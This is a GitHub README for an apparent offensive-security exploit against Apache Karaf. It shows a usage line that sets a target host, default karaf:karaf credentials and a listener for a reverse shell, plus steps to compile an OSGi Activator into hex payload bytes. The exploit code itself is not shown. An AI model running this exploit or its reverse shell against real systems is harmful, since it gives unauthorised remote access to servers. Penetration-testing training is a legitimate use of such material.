Skip to content

Latest commit

 

History

History
31 lines (30 loc) · 993 Bytes

README.md

File metadata and controls

31 lines (30 loc) · 993 Bytes
Raw

offsec-karaf-exploits

Usage:

python exploit.py --help

Example:

python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 --lport=4444 --creds=karaf:karaf

Rebuild Payload

Setup Felix Framework

  1. Create the lib directory
mkdir -p ./revshell/lib
  1. Download Felix Framework 7.0.5
  2. Extract the zip archive
  3. Copy the org.apache.felix.main.distribution-7.0.5/bin/felix.jar to ./revshell/lib/felix.jar

Generate Activator Class

cd revshell/bundle
javac -d ../classes -cp ../lib/felix.jar com/visionspace/osgi/revshell/Activator.java

Get Hex Values

Hex values make up the reverse shell in the exploit

./class_to_payload.py revshell/classes/com/visionspace/osgi/revshell/Activator.class

Resources

Felix Framework